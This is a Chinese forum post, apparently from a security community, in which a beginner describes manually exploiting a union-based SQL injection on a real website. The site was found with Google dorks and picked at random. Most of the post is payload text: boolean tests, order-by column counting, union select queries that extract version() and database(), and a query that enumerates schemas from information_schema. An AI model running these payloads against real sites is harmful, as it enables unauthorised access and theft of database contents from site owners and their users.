萌新记录一次src某网站的显错注入

4319083   ·   发表于 2021-07-25 16:15:30   ·   实战纪实

前面挖了几次都是 and 1=1 and 1=2 报错的话就直接丢sqlmap跑 (其实是手动没做出来)
这次手动做,靶场的做法一样
通过谷歌语法找网站
地区+inurl:asp?id=50
地区+inurl:php?id=50
地区+inurl:”type_id=1
选中一个倒霉蛋开始
在id=2后面插入 and 1=1 and 1=2 发现报错

有注入,用显错注入
id=2 and 1=1 order by 13 一直到14不报错 那就是13 了


开始联合查询 id=1 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13


有回显是:4 9 12,在4的方查询PHP版本信息,在12的地方查库名

id=2 and 1=1 union select 1,2,3,version(),5,6,7,8,9,10,11,database(),13#cp


出来一个库名查询下其他库名
id=2 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,table_schema,13 from information_schema.tables#cp

选择51ganxi这个表来看下
这里使用limit 0,1 会报错不知道为啥


查出来表名
然后使用语句查询字段名和数据

用户名金币积分时间理由
xiaozhu7719 3.00 0 2021-09-26 15:03:39 一个受益终生的帖子~~
xiaozhu7719 1.00 0 2021-09-26 15:03:19 一个受益终生的帖子~~

打赏我,让我更有动力~

1 Reply   |  Until 3个月前 | 742 View

xiaozhu7719
发表于 3个月前

看你的居然看懂了哈哈

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.